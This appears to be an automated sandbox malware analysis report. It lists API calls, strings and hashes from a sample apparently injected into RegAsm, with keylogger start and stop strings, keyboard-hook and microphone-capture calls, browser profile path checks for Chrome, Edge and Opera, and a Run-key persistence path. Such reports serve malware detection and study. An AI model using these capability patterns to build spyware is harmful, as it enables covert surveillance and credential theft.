                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: : $Se.
                            • API String ID: 4218353326-4089948878
                            • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                            • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                            • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                            • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                            APIs
                            • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocalTime
                            • String ID: | $%02i:%02i:%02i:%03i
                            • API String ID: 481472006-2430845779
                            • Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                            • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                            • Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                            • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: alarm.wav$hYG
                            • API String ID: 1174141254-2782910960
                            • Opcode ID: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                            • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                            • Opcode Fuzzy Hash: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                            • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                            APIs
                              • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                              • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            • CloseHandle.KERNEL32(?), ref: 0040B0EF
                            • UnhookWindowsHookEx.USER32 ref: 0040B102
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                            • String ID: Online Keylogger Stopped
                            • API String ID: 1623830855-1496645233
                            • Opcode ID: af233fb170c3e7993f7e935a79561d089458a16838c3db048d5fa7cce78358a9
                            • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                            • Opcode Fuzzy Hash: af233fb170c3e7993f7e935a79561d089458a16838c3db048d5fa7cce78358a9
                            • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                              • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: Exception@8Throw$ExceptionRaise
                            • String ID: Unknown exception
                            • API String ID: 3476068407-410509341
                            • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                            • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                            • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                            • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                            APIs
                              • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                              • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                              • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                              • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                            • _abort.LIBCMT ref: 10006DB0
                            • _free.LIBCMT ref: 10006DE4
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: ErrorLast_abort_free
                            • String ID: xV
                            • API String ID: 289325740-2633863268
                            • Opcode ID: 4134211a845f049e2d4acd9fd6b474a5821acff52e97e1c06e3fd46459b96409
                            • Instruction ID: 7f3fd5b75712fc04265cec68ea5e7784da53d851e8b66a8ea6aaee171cc4b2ef
                            • Opcode Fuzzy Hash: 4134211a845f049e2d4acd9fd6b474a5821acff52e97e1c06e3fd46459b96409
                            • Instruction Fuzzy Hash: 8B018439E01A32DBE751DF688C4115DB3A2FF08BE1B25821AE85067249CB35BD528FC5
                            APIs
                            • waveInPrepareHeader.WINMM(00509000,00000020,?), ref: 00401849
                            • waveInAddBuffer.WINMM(00509000,00000020), ref: 0040185F
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: wave$BufferHeaderPrepare
                            • String ID: XMG
                            • API String ID: 2315374483-813777761
                            • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                            • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                            • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                            • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                            APIs
                            • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocaleValid
                            • String ID: IsValidLocaleName$kKD
                            • API String ID: 1901932003-3269126172
                            • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                            • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                            • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                            • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: UserProfile$\AppData\Local\Google\Chrome\
                            • API String ID: 1174141254-4188645398
                            • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                            • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                            • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                            • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                            • API String ID: 1174141254-2800177040
                            • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                            • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                            • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                            • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: AppData$\Opera Software\Opera Stable\
                            • API String ID: 1174141254-1629609700
                            • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                            • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                            • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                            • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID: X8S
                            • API String ID: 269201875-2014517935
                            • Opcode ID: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                            • Instruction ID: 5d396c1abc39b18bdc3e623667384c8b5cce6391ee106473ff554fc58991571d
                            • Opcode Fuzzy Hash: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                            • Instruction Fuzzy Hash: 7CE0E532A0652041F675763B2D05A5B47C55FC2B3AF22033BF028861C1DFEC494A606E
                            APIs
                            • GetKeyState.USER32(00000011), ref: 0040B686
                              • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                              • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                              • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                              • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                              • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                              • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                              • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                              • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                            • String ID: [AltL]$[AltR]
                            • API String ID: 2738857842-2658077756
                            • Opcode ID: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                            • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                            • Opcode Fuzzy Hash: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                            • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell
                            • String ID: !D@$open
                            • API String ID: 587946157-1586967515
                            • Opcode ID: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                            • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                            • Opcode Fuzzy Hash: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                            • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                            APIs
                            • GetKeyState.USER32(00000012), ref: 0040B6E0
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: State
                            • String ID: [CtrlL]$[CtrlR]
                            • API String ID: 1649606143-2446555240
                            • Opcode ID: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                            • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                            • Opcode Fuzzy Hash: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                            • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                            APIs
                              • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                            • __Init_thread_footer.LIBCMT ref: 00410F64
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Init_thread_footer__onexit
                            • String ID: ,kG$0kG
                            • API String ID: 1881088180-2015055088
                            • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                            • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                            • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                            • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                            APIs
                            Strings
                            • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteOpenValue
                            • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                            • API String ID: 2654517830-1051519024
                            • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                            • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                            • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                            • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                            APIs
                            • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                            • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteDirectoryFileRemove
                            • String ID: pth_unenc
                            • API String ID: 3325800564-4028850238
                            • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                            • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                            • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                            • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                            APIs
                            • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                            • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ObjectProcessSingleTerminateWait
                            • String ID: pth_unenc
                            • API String ID: 1872346434-4028850238
                            • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                            • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                            • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                            • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                            APIs
                            • GetLastInputInfo.USER32(NG), ref: 0041BB87
                            • GetTickCount.KERNEL32(?,?,?,00415BDE), ref: 0041BB8D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountInfoInputLastTick
                            • String ID: NG
                            • API String ID: 3478931382-1651712548
                            • Opcode ID: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                            • Instruction ID: 91b37e9d9b7f8f393223e5bf0be67cbbeb1ccf95644ad96dbec1e326022f3834
                            • Opcode Fuzzy Hash: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                            • Instruction Fuzzy Hash: 84D0C97180060CABDB04AFA5EC4D99DBBBCEB05212F1042A5E84992210DA71AA548A95
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                            • GetLastError.KERNEL32 ref: 00440D85
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID:
                            • API String ID: 1717984340-0
                            • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                            • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                            • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                            • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                            APIs
                            • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411F2B), ref: 00411BC7
                            • IsBadReadPtr.KERNEL32(?,00000014,00411F2B), ref: 00411C93
                            • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                            • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastRead
                            • String ID:
                            • API String ID: 4100373531-0
                            • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                            • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                            • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                            • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:9.2%
                            Signature Coverage:0%
                            Total number of Nodes:1990
                            Total number of Limit Nodes:56
                            execution_graph 37716 4466f4 37735 446904 37716->37735 37718 446700 GetModuleHandleA 37721 446710 __set_app_type __p__fmode __p__commode 37718->37721 37720 4467a4 37722 4467ac __setusermatherr 37720->37722 37723 4467b8 37720->37723 37721->37720 37722->37723 37736 4468f0 _controlfp 37723->37736 37725 4467bd _initterm GetEnvironmentStringsW _initterm 37726 44681e GetStartupInfoW 37725->37726 37727 446810 37725->37727 37729 446866 GetModuleHandleA 37726->37729 37737 41276d 37729->37737 37733 446896 exit 37734 44689d _cexit 37733->37734 37734->37727 37735->37718 37736->37725 37738 41277d 37737->37738 37780 4044a4 LoadLibraryW 37738->37780 37740 412785 37741 412789 37740->37741 37786 414b81 37740->37786 37741->37733 37741->37734 37744 4127c8 37790 412465 memset ??2@YAPAXI 37744->37790 37746 4127ea 37802 40ac21 37746->37802 37751 412813 37820 40dd07 memset 37751->37820 37752 412827 37825 40db69 memset 37752->37825 37755 412822 37847 4125b6 ??3@YAXPAX DeleteObject 37755->37847 37757 40ada2 _wcsicmp 37758 41283d 37757->37758 37758->37755 37761 412863 CoInitialize 37758->37761 37830 41268e 37758->37830 37760 412966 37848 40b1ab ??3@YAXPAX ??3@YAXPAX 37760->37848 37846 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37761->37846 37765 41296f 37849 40b633 37765->37849 37767 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37772 412957 CoUninitialize 37767->37772 37777 4128ca 37767->37777 37772->37755 37773 4128d0 TranslateAcceleratorW 37774 412941 GetMessageW 37773->37774 37773->37777 37774->37772 37774->37773 37775 412909 IsDialogMessageW 37775->37774 37775->37777 37776 4128fd IsDialogMessageW 37776->37774 37776->37775 37777->37773 37777->37775 37777->37776 37778 41292b TranslateMessage DispatchMessageW 37777->37778 37779 41291f IsDialogMessageW 37777->37779 37778->37774 37779->37774 37779->37778 37781 4044f3 37780->37781 37785 4044cf FreeLibrary 37780->37785 37783 404507 MessageBoxW 37781->37783 37784 40451e 37781->37784 37783->37740 37784->37740 37785->37781 37787 414b8a 